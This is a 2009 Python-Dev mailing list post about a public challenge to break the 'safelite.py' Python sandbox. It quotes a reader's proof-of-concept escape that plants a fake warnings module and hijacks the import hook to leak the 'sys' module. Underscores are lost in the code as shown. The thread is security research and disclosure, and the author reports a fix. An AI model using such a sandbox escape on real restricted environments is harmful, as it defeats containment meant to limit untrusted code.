[Python-Dev] Challenge: Please break this! [Now with blog post] (original) (raw)

tav tav at espians.com
Tue Feb 24 09:27:01 CET 2009

Daniel emailed in the exploit below and it is pretty devastating. It takes advantage of the fact that the warnings framework in 2.6+ dynamically imports modules without being explicitly called!!

I've fixed this hole in safelite.py, but would be interested to know if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!

On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:

Here's my attempt. Uses the builtin warnings module.You might need to change 'args[1]' to 'args[2]' depending on your environment.

I really don't like to post these to public MLs, but feel free to do so if you think no harm may arise from this one ;) Daniel ---- from safelite import FileReader # Let's build a fake module warnings = builtins.class('warnings') # Fill it with deception warnings.defaultaction = "ignore" # And provide a supporting thug def import(*args):  try:  print "How nice:\n", args[1].keys()  global sys  sys = args[1]['sys']  except Exception, v:  print "Exception:", v  return warnings # Put the bogus module at the doorstep... builtins.warnings = warnings # and have the thug replacing the doorman builtins_.import = _import # An unsuspecting costumer passes by... FileReader('safelite.py').seek(1.1) # ... and is brutally mugged :) print sys print dir(sys)

-- love, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369 http://tav.espians.com | http://twitter.com/tav | skype:tavespian

More information about the Python-Dev mailing list